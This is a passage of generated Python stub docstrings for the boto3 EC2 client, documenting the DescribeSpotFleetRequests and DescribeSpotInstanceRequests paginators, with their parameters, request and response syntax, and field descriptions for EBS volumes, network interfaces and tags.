Indicates whether the EBS volume is deleted on instance termination.
- **Iops** *(integer) --*
The number of I/O operations per second (IOPS) that the volume supports. For ``io1`` volumes, this represents the number of IOPS that are provisioned for the volume. For ``gp2`` volumes, this represents the baseline performance of the volume and the rate at which the volume accumulates I/O credits for bursting. For more information, see `Amazon EBS Volume Types <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
Constraints: Range is 100-16,000 IOPS for ``gp2`` volumes and 100 to 64,000IOPS for ``io1`` volumes, in most Regions. The maximum IOPS for ``io1`` of 64,000 is guaranteed only on `Nitro-based instances <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html#ec2-nitro-instances>`__ . Other instance families guarantee performance up to 32,000 IOPS.
Condition: This parameter is required for requests to create ``io1`` volumes; it is not used in requests to create ``gp2`` , ``st1`` , ``sc1`` , or ``standard`` volumes.
- **SnapshotId** *(string) --*
The ID of the snapshot.
- **VolumeSize** *(integer) --*
The size of the volume, in GiB.
Default: If you're creating the volume from a snapshot and don't specify a volume size, the default is the snapshot size.
Constraints: 1-16384 for General Purpose SSD (``gp2`` ), 4-16384 for Provisioned IOPS SSD (``io1`` ), 500-16384 for Throughput Optimized HDD (``st1`` ), 500-16384 for Cold HDD (``sc1`` ), and 1-1024 for Magnetic (``standard`` ) volumes. If you specify a snapshot, the volume size must be equal to or larger than the snapshot size.
- **VolumeType** *(string) --*
The volume type. If you set the type to ``io1`` , you must also set the **Iops** property.
Default: ``standard``
- **Encrypted** *(boolean) --*
Indicates whether the EBS volume is encrypted. Encrypted volumes can only be attached to instances that support Amazon EBS encryption.
If you are creating a volume from a snapshot, you cannot specify an encryption value. This is because only blank volumes can be encrypted on creation. If you are creating a snapshot from an existing EBS volume, you cannot specify an encryption value that differs from that of the EBS volume. We recommend that you omit the encryption value from the block device mappings when creating an image from an instance.
- **KmsKeyId** *(string) --*
Identifier (key ID, key alias, ID ARN, or alias ARN) for a user-managed CMK under which the EBS volume is encrypted.
This parameter is only supported on ``BlockDeviceMapping`` objects called by `RunInstances <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_RunInstances.html>`__ , `RequestSpotFleet <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_RequestSpotFleet.html>`__ , and `RequestSpotInstances <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_RequestSpotInstances.html>`__ .
- **NoDevice** *(string) --*
Suppresses the specified device included in the block device mapping of the AMI.
- **EbsOptimized** *(boolean) --*
Indicates whether the instances are optimized for EBS I/O. This optimization provides dedicated throughput to Amazon EBS and an optimized configuration stack to provide optimal EBS I/O performance. This optimization isn't available with all instance types. Additional usage charges apply when using an EBS Optimized instance.
Default: ``false``
- **IamInstanceProfile** *(dict) --*
The IAM instance profile.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the instance profile.
- **Name** *(string) --*
The name of the instance profile.
- **ImageId** *(string) --*
The ID of the AMI.
- **InstanceType** *(string) --*
The instance type.
- **KernelId** *(string) --*
The ID of the kernel.
- **KeyName** *(string) --*
The name of the key pair.
- **Monitoring** *(dict) --*
Enable or disable monitoring for the instances.
- **Enabled** *(boolean) --*
Enables monitoring for the instance.
Default: ``false``
- **NetworkInterfaces** *(list) --*
One or more network interfaces. If you specify a network interface, you must specify subnet IDs and security group IDs using the network interface.
- *(dict) --*
Describes a network interface.
- **AssociatePublicIpAddress** *(boolean) --*
Indicates whether to assign a public IPv4 address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one. You cannot specify more than one network interface in the request. If launching into a default subnet, the default value is ``true`` .
- **DeleteOnTermination** *(boolean) --*
If set to ``true`` , the interface is deleted when the instance is terminated. You can specify ``true`` only if creating a new network interface when launching an instance.
- **Description** *(string) --*
The description of the network interface. Applies only if creating a network interface when launching an instance.
- **DeviceIndex** *(integer) --*
The index of the device on the instance for the network interface attachment. If you are specifying a network interface in a RunInstances request, you must provide the device index.
- **Groups** *(list) --*
The IDs of the security groups for the network interface. Applies only if creating a network interface when launching an instance.
- *(string) --*
- **Ipv6AddressCount** *(integer) --*
A number of IPv6 addresses to assign to the network interface. Amazon EC2 chooses the IPv6 addresses from the range of the subnet. You cannot specify this option and the option to assign specific IPv6 addresses in the same request. You can specify this option if you've specified a minimum number of instances to launch.
- **Ipv6Addresses** *(list) --*
One or more IPv6 addresses to assign to the network interface. You cannot specify this option and the option to assign a number of IPv6 addresses in the same request. You cannot specify this option if you've specified a minimum number of instances to launch.
- *(dict) --*
Describes an IPv6 address.
- **Ipv6Address** *(string) --*
The IPv6 address.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **PrivateIpAddress** *(string) --*
The private IPv4 address of the network interface. Applies only if creating a network interface when launching an instance. You cannot specify this option if you're launching more than one instance in a RunInstances request.
- **PrivateIpAddresses** *(list) --*
One or more private IPv4 addresses to assign to the network interface. Only one private IPv4 address can be designated as primary. You cannot specify this option if you're launching more than one instance in a RunInstances request.
- *(dict) --*
Describes a secondary private IPv4 address for a network interface.
- **Primary** *(boolean) --*
Indicates whether the private IPv4 address is the primary private IPv4 address. Only one IPv4 address can be designated as primary.
- **PrivateIpAddress** *(string) --*
The private IPv4 addresses.
- **SecondaryPrivateIpAddressCount** *(integer) --*
The number of secondary private IPv4 addresses. You can't specify this option and specify more than one private IP address using the private IP addresses option. You cannot specify this option if you're launching more than one instance in a RunInstances request.
- **SubnetId** *(string) --*
The ID of the subnet associated with the network string. Applies only if creating a network interface when launching an instance.
- **InterfaceType** *(string) --*
The type of interface.
- **Placement** *(dict) --*
The placement information.
- **AvailabilityZone** *(string) --*
The Availability Zone.
[Spot Fleet only] To specify multiple Availability Zones, separate them using commas; for example, "us-west-2a, us-west-2b".
- **GroupName** *(string) --*
The name of the placement group.
- **Tenancy** *(string) --*
The tenancy of the instance (if the instance is running in a VPC). An instance with a tenancy of ``dedicated`` runs on single-tenant hardware. The ``host`` tenancy is not supported for Spot Instances.
- **RamdiskId** *(string) --*
The ID of the RAM disk.
- **SpotPrice** *(string) --*
The maximum price per unit hour that you are willing to pay for a Spot Instance. If this value is not specified, the default is the Spot price specified for the fleet. To determine the Spot price per unit hour, divide the Spot price by the value of ``WeightedCapacity`` .
- **SubnetId** *(string) --*
The ID of the subnet in which to launch the instances. To specify multiple subnets, separate them using commas; for example, "subnet-a61dafcf, subnet-65ea5f08".
- **UserData** *(string) --*
The Base64-encoded user data to make available to the instances.
- **WeightedCapacity** *(float) --*
The number of units provided by the specified instance type. These are the same units that you chose to set the target capacity in terms (instances or a performance characteristic such as vCPUs, memory, or I/O).
If the target capacity divided by this value is not a whole number, we round the number of instances to the next whole number. If this value is not specified, the default is 1.
- **TagSpecifications** *(list) --*
The tags to apply during creation.
- *(dict) --*
The tags for a Spot Fleet resource.
- **ResourceType** *(string) --*
The type of resource. Currently, the only resource type that is supported is ``instance`` .
- **Tags** *(list) --*
The tags.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **LaunchTemplateConfigs** *(list) --*
The launch template and overrides. If you specify ``LaunchTemplateConfigs`` , you can't specify ``LaunchSpecifications`` .
- *(dict) --*
Describes a launch template and overrides.
- **LaunchTemplateSpecification** *(dict) --*
The launch template.
- **LaunchTemplateId** *(string) --*
The ID of the launch template. You must specify either a template ID or a template name.
- **LaunchTemplateName** *(string) --*
The name of the launch template. You must specify either a template name or a template ID.
- **Version** *(string) --*
The version number of the launch template. You must specify a version number.
- **Overrides** *(list) --*
Any parameters that you specify override the same parameters in the launch template.
- *(dict) --*
Describes overrides for a launch template.
- **InstanceType** *(string) --*
The instance type.
- **SpotPrice** *(string) --*
The maximum price per unit hour that you are willing to pay for a Spot Instance.
- **SubnetId** *(string) --*
The ID of the subnet in which to launch the instances.
- **AvailabilityZone** *(string) --*
The Availability Zone in which to launch the instances.
- **WeightedCapacity** *(float) --*
The number of units provided by the specified instance type.
- **Priority** *(float) --*
The priority for the launch template override. If **OnDemandAllocationStrategy** is set to ``prioritized`` , Spot Fleet uses priority to determine which launch template override to use first in fulfilling On-Demand capacity. The highest priority is launched first. Valid values are whole numbers starting at ``0`` . The lower the number, the higher the priority. If no number is set, the launch template override has the lowest priority.
- **SpotPrice** *(string) --*
The maximum price per unit hour that you are willing to pay for a Spot Instance. The default is the On-Demand price.
- **TargetCapacity** *(integer) --*
The number of units to request. You can choose to set the target capacity in terms of instances or a performance characteristic that is important to your application workload, such as vCPUs, memory, or I/O. If the request type is ``maintain`` , you can specify a target capacity of 0 and add capacity later.
- **OnDemandTargetCapacity** *(integer) --*
The number of On-Demand units to request. You can choose to set the target capacity in terms of instances or a performance characteristic that is important to your application workload, such as vCPUs, memory, or I/O. If the request type is ``maintain`` , you can specify a target capacity of 0 and add capacity later.
- **TerminateInstancesWithExpiration** *(boolean) --*
Indicates whether running Spot Instances should be terminated when the Spot Fleet request expires.
- **Type** *(string) --*
The type of request. Indicates whether the Spot Fleet only requests the target capacity or also attempts to maintain it. When this value is ``request`` , the Spot Fleet only places the required requests. It does not attempt to replenish Spot Instances if capacity is diminished, nor does it submit requests in alternative Spot pools if capacity is not available. When this value is ``maintain`` , the Spot Fleet maintains the target capacity. The Spot Fleet places the required requests to meet capacity and automatically replenishes any interrupted instances. Default: ``maintain`` . ``instant`` is listed but is not used by Spot Fleet.
- **ValidFrom** *(datetime) --*
The start date and time of the request, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z). The default is to start fulfilling the request immediately.
- **ValidUntil** *(datetime) --*
The end date and time of the request, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z). At this point, no new Spot Instance requests are placed or able to fulfill the request. If no value is specified, the Spot Fleet request remains until you cancel it.
- **ReplaceUnhealthyInstances** *(boolean) --*
Indicates whether Spot Fleet should replace unhealthy instances.
- **InstanceInterruptionBehavior** *(string) --*
The behavior when a Spot Instance is interrupted. The default is ``terminate`` .
- **LoadBalancersConfig** *(dict) --*
One or more Classic Load Balancers and target groups to attach to the Spot Fleet request. Spot Fleet registers the running Spot Instances with the specified Classic Load Balancers and target groups.
With Network Load Balancers, Spot Fleet cannot register instances that have the following instance types: C1, CC1, CC2, CG1, CG2, CR1, CS1, G1, G2, HI1, HS1, M1, M2, M3, and T1.
- **ClassicLoadBalancersConfig** *(dict) --*
The Classic Load Balancers.
- **ClassicLoadBalancers** *(list) --*
One or more Classic Load Balancers.
- *(dict) --*
Describes a Classic Load Balancer.
- **Name** *(string) --*
The name of the load balancer.
- **TargetGroupsConfig** *(dict) --*
The target groups.
- **TargetGroups** *(list) --*
One or more target groups.
- *(dict) --*
Describes a load balancer target group.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the target group.
- **InstancePoolsToUseCount** *(integer) --*
The number of Spot pools across which to allocate your target Spot capacity. Valid only when Spot **AllocationStrategy** is set to ``lowest-price`` . Spot Fleet selects the cheapest Spot pools and evenly allocates your target Spot capacity across the number of Spot pools that you specify.
- **SpotFleetRequestId** *(string) --*
The ID of the Spot Fleet request.
- **SpotFleetRequestState** *(string) --*
The state of the Spot Fleet request.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type SpotFleetRequestIds: list
:param SpotFleetRequestIds:
The IDs of the Spot Fleet requests.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeSpotInstanceRequests(Paginator):
def paginate(self, Filters: List = None, DryRun: bool = None, SpotInstanceRequestIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_spot_instance_requests`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSpotInstanceRequests>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
SpotInstanceRequestIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'SpotInstanceRequests': [
{
'ActualBlockHourlyPrice': 'string',
'AvailabilityZoneGroup': 'string',
'BlockDurationMinutes': 123,
'CreateTime': datetime(2015, 1, 1),
'Fault': {
'Code': 'string',
'Message': 'string'
},
'InstanceId': 'string',
'LaunchGroup': 'string',
'LaunchSpecification': {
'UserData': 'string',
'SecurityGroups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'AddressingType': 'string',
'BlockDeviceMappings': [
{
'DeviceName': 'string',
'VirtualName': 'string',
'Ebs': {
'DeleteOnTermination': True|False,
'Iops': 123,
'SnapshotId': 'string',
'VolumeSize': 123,
'VolumeType': 'standard'|'io1'|'gp2'|'sc1'|'st1',
'Encrypted': True|False,
'KmsKeyId': 'string'
},
'NoDevice': 'string'
},
],
'EbsOptimized': True|False,
'IamInstanceProfile': {
'Arn': 'string',
'Name': 'string'
},
'ImageId': 'string',
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'KernelId': 'string',
'KeyName': 'string',
'NetworkInterfaces': [
{
'AssociatePublicIpAddress': True|False,
'DeleteOnTermination': True|False,
'Description': 'string',
'DeviceIndex': 123,
'Groups': [
'string',
],
'Ipv6AddressCount': 123,
'Ipv6Addresses': [
{
'Ipv6Address': 'string'
},
],
'NetworkInterfaceId': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'Primary': True|False,
'PrivateIpAddress': 'string'
},
],
'SecondaryPrivateIpAddressCount': 123,
'SubnetId': 'string',
'InterfaceType': 'string'
},
],
'Placement': {
'AvailabilityZone': 'string',
'GroupName': 'string',
'Tenancy': 'default'|'dedicated'|'host'
},
'RamdiskId': 'string',
'SubnetId': 'string',
'Monitoring': {
'Enabled': True|False
}
},
'LaunchedAvailabilityZone': 'string',
'ProductDescription': 'Linux/UNIX'|'Linux/UNIX (Amazon VPC)'|'Windows'|'Windows (Amazon VPC)',
'SpotInstanceRequestId': 'string',
'SpotPrice': 'string',
'State': 'open'|'active'|'closed'|'cancelled'|'failed',
'Status': {
'Code': 'string',
'Message': 'string',
'UpdateTime': datetime(2015, 1, 1)
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'Type': 'one-time'|'persistent',
'ValidFrom': datetime(2015, 1, 1),
'ValidUntil': datetime(2015, 1, 1),
'InstanceInterruptionBehavior': 'hibernate'|'stop'|'terminate'
},
],
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeSpotInstanceRequests.
- **SpotInstanceRequests** *(list) --*
One or more Spot Instance requests.
- *(dict) --*
Describes a Spot Instance request.
- **ActualBlockHourlyPrice** *(string) --*
If you specified a duration and your Spot Instance request was fulfilled, this is the fixed hourly price in effect for the Spot Instance while it runs.
- **AvailabilityZoneGroup** *(string) --*
The Availability Zone group. If you specify the same Availability Zone group for all Spot Instance requests, all Spot Instances are launched in the same Availability Zone.
- **BlockDurationMinutes** *(integer) --*
The duration for the Spot Instance, in minutes.
- **CreateTime** *(datetime) --*
The date and time when the Spot Instance request was created, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z).
- **Fault** *(dict) --*
The fault codes for the Spot Instance request, if any.
- **Code** *(string) --*
The reason code for the Spot Instance state change.
- **Message** *(string) --*
The message for the Spot Instance state change.
- **InstanceId** *(string) --*
The instance ID, if an instance has been launched to fulfill the Spot Instance request.
- **LaunchGroup** *(string) --*
The instance launch group. Launch groups are Spot Instances that launch together and terminate together.
- **LaunchSpecification** *(dict) --*
Additional information for launching instances.
- **UserData** *(string) --*
The Base64-encoded user data for the instance.
- **SecurityGroups** *(list) --*
One or more security groups. When requesting instances in a VPC, you must specify the IDs of the security groups. When requesting instances in EC2-Classic, you can specify the names or the IDs of the security groups.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **AddressingType** *(string) --*
Deprecated.
- **BlockDeviceMappings** *(list) --*
One or more block device mapping entries.
- *(dict) --*
Describes a block device mapping.
- **DeviceName** *(string) --*
The device name (for example, ``/dev/sdh`` or ``xvdh`` ).
- **VirtualName** *(string) --*
The virtual device name (``ephemeral`` N). Instance store volumes are numbered starting from 0. An instance type with 2 available instance store volumes can specify mappings for ``ephemeral0`` and ``ephemeral1`` . The number of available instance store volumes depends on the instance type. After you connect to the instance, you must mount the volume.
NVMe instance store volumes are automatically enumerated and assigned a device name. Including them in your block device mapping has no effect.
Constraints: For M3 instances, you must specify instance store volumes in the block device mapping for the instance. When you launch an M3 instance, we ignore any instance store volumes specified in the block device mapping for the AMI.
- **Ebs** *(dict) --*
Parameters used to automatically set up EBS volumes when the instance is launched.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the EBS volume is deleted on instance termination.
- **Iops** *(integer) --*
The number of I/O operations per second (IOPS) that the volume supports. For ``io1`` volumes, this represents the number of IOPS that are provisioned for the volume. For ``gp2`` volumes, this represents the baseline performance of the volume and the rate at which the volume accumulates I/O credits for bursting. For more information, see `Amazon EBS Volume Types <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
Constraints: Range is 100-16,000 IOPS for ``gp2`` volumes and 100 to 64,000IOPS for ``io1`` volumes, in most Regions. The maximum IOPS for ``io1`` of 64,000 is guaranteed only on `Nitro-based instances <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html#ec2-nitro-instances>`__ . Other instance families guarantee performance up to 32,000 IOPS.
Condition: This parameter is required for requests to create ``io1`` volumes; it is not used in requests to create ``gp2`` , ``st1`` , ``sc1`` , or ``standard`` volumes.
- **SnapshotId** *(string) --*
The ID of the snapshot.
- **VolumeSize** *(integer) --*
The size of the volume, in GiB.
Default: If you're creating the volume from a snapshot and don't specify a volume size, the default is the snapshot size.
Constraints: 1-16384 for General Purpose SSD (``gp2`` ), 4-16384 for Provisioned IOPS SSD (``io1`` ), 500-16384 for Throughput Optimized HDD (``st1`` ), 500-16384 for Cold HDD (``sc1`` ), and 1-1024 for Magnetic (``standard`` ) volumes. If you specify a snapshot, the volume size must be equal to or larger than the snapshot size.
- **VolumeType** *(string) --*
The volume type. If you set the type to ``io1`` , you must also set the **Iops** property.
Default: ``standard``
- **Encrypted** *(boolean) --*
Indicates whether the EBS volume is encrypted. Encrypted volumes can only be attached to instances that support Amazon EBS encryption.
If you are creating a volume from a snapshot, you cannot specify an encryption value. This is because only blank volumes can be encrypted on creation. If you are creating a snapshot from an existing EBS volume, you cannot specify an encryption value that differs from that of the EBS volume. We recommend that you omit the encryption value from the block device mappings when creating an image from an instance.
- **KmsKeyId** *(string) --*
Identifier (key ID, key alias, ID ARN, or alias ARN) for a user-managed CMK under which the EBS volume is encrypted.
This parameter is only supported on ``BlockDeviceMapping`` objects called by `RunInstances <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_RunInstances.html>`__ , `RequestSpotFleet <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_RequestSpotFleet.html>`__ , and `RequestSpotInstances <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_RequestSpotInstances.html>`__ .
- **NoDevice** *(string) --*
Suppresses the specified device included in the block device mapping of the AMI.
- **EbsOptimized** *(boolean) --*
Indicates whether the instance is optimized for EBS I/O. This optimization provides dedicated throughput to Amazon EBS and an optimized configuration stack to provide optimal EBS I/O performance. This optimization isn't available with all instance types. Additional usage charges apply when using an EBS Optimized instance.
Default: ``false``
- **IamInstanceProfile** *(dict) --*
The IAM instance profile.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the instance profile.
- **Name** *(string) --*
The name of the instance profile.
- **ImageId** *(string) --*
The ID of the AMI.
- **InstanceType** *(string) --*
The instance type.
- **KernelId** *(string) --*
The ID of the kernel.
- **KeyName** *(string) --*
The name of the key pair.
- **NetworkInterfaces** *(list) --*
One or more network interfaces. If you specify a network interface, you must specify subnet IDs and security group IDs using the network interface.
- *(dict) --*
Describes a network interface.
- **AssociatePublicIpAddress** *(boolean) --*
Indicates whether to assign a public IPv4 address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one. You cannot specify more than one network interface in the request. If launching into a default subnet, the default value is ``true`` .
- **DeleteOnTermination** *(boolean) --*
If set to ``true`` , the interface is deleted when the instance is terminated. You can specify ``true`` only if creating a new network interface when launching an instance.
- **Description** *(string) --*
The description of the network interface. Applies only if creating a network interface when launching an instance.
- **DeviceIndex** *(integer) --*
The index of the device on the instance for the network interface attachment. If you are specifying a network interface in a RunInstances request, you must provide the device index.
- **Groups** *(list) --*
The IDs of the security groups for the network interface. Applies only if creating a network interface when launching an instance.
- *(string) --*
- **Ipv6AddressCount** *(integer) --*
A number of IPv6 addresses to assign to the network interface. Amazon EC2 chooses the IPv6 addresses from the range of the subnet. You cannot specify this option and the option to assign specific IPv6 addresses in the same request. You can specify this option if you've specified a minimum number of instances to launch.
- **Ipv6Addresses** *(list) --*
One or more IPv6 addresses to assign to the network interface. You cannot specify this option and the option to assign a number of IPv6 addresses in the same request. You cannot specify this option if you've specified a minimum number of instances to launch.
- *(dict) --*
Describes an IPv6 address.
- **Ipv6Address** *(string) --*
The IPv6 address.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **PrivateIpAddress** *(string) --*
The private IPv4 address of the network interface. Applies only if creating a network interface when launching an instance. You cannot specify this option if you're launching more than one instance in a RunInstances request.
- **PrivateIpAddresses** *(list) --*
One or more private IPv4 addresses to assign to the network interface. Only one private IPv4 address can be designated as primary. You cannot specify this option if you're launching more than one instance in a RunInstances request.
- *(dict) --*
Describes a secondary private IPv4 address for a network interface.
- **Primary** *(boolean) --*
Indicates whether the private IPv4 address is the primary private IPv4 address. Only one IPv4 address can be designated as primary.
- **PrivateIpAddress** *(string) --*
The private IPv4 addresses.
- **SecondaryPrivateIpAddressCount** *(integer) --*
The number of secondary private IPv4 addresses. You can't specify this option and specify more than one private IP address using the private IP addresses option. You cannot specify this option if you're launching more than one instance in a RunInstances request.
- **SubnetId** *(string) --*
The ID of the subnet associated with the network string. Applies only if creating a network interface when launching an instance.
- **InterfaceType** *(string) --*
The type of interface.
- **Placement** *(dict) --*
The placement information for the instance.
- **AvailabilityZone** *(string) --*
The Availability Zone.
[Spot Fleet only] To specify multiple Availability Zones, separate them using commas; for example, "us-west-2a, us-west-2b".
- **GroupName** *(string) --*
The name of the placement group.
- **Tenancy** *(string) --*
The tenancy of the instance (if the instance is running in a VPC). An instance with a tenancy of ``dedicated`` runs on single-tenant hardware. The ``host`` tenancy is not supported for Spot Instances.
- **RamdiskId** *(string) --*
The ID of the RAM disk.
- **SubnetId** *(string) --*
The ID of the subnet in which to launch the instance.
- **Monitoring** *(dict) --*
Describes the monitoring of an instance.
- **Enabled** *(boolean) --*
Indicates whether detailed monitoring is enabled. Otherwise, basic monitoring is enabled.
- **LaunchedAvailabilityZone** *(string) --*
The Availability Zone in which the request is launched.
- **ProductDescription** *(string) --*
The product description associated with the Spot Instance.
- **SpotInstanceRequestId** *(string) --*
The ID of the Spot Instance request.
- **SpotPrice** *(string) --*
The maximum price per hour that you are willing to pay for a Spot Instance.
- **State** *(string) --*
The state of the Spot Instance request. Spot status information helps track your Spot Instance requests. For more information, see `Spot Status <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/spot-bid-status.html>`__ in the *Amazon EC2 User Guide for Linux Instances* .
- **Status** *(dict) --*
The status code and status message describing the Spot Instance request.
- **Code** *(string) --*
The status code. For a list of status codes, see `Spot Status Codes <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/spot-bid-status.html#spot-instance-bid-status-understand>`__ in the *Amazon EC2 User Guide for Linux Instances* .
- **Message** *(string) --*
The description for the status code.
- **UpdateTime** *(datetime) --*
The date and time of the most recent status update, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z).
- **Tags** *(list) --*
Any tags assigned to the resource.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **Type** *(string) --*
The Spot Instance request type.
- **ValidFrom** *(datetime) --*
The start date of the request, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z). The request becomes active at this date and time.
- **ValidUntil** *(datetime) --*
The end date of the request, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z). If this is a one-time request, it remains active until all instances launch, the request is canceled, or this date is reached. If the request is persistent, it remains active until it is canceled or this date is reached. The default end date is 7 days from the current date.
- **InstanceInterruptionBehavior** *(string) --*
The behavior when a Spot Instance is interrupted.
:type Filters: list
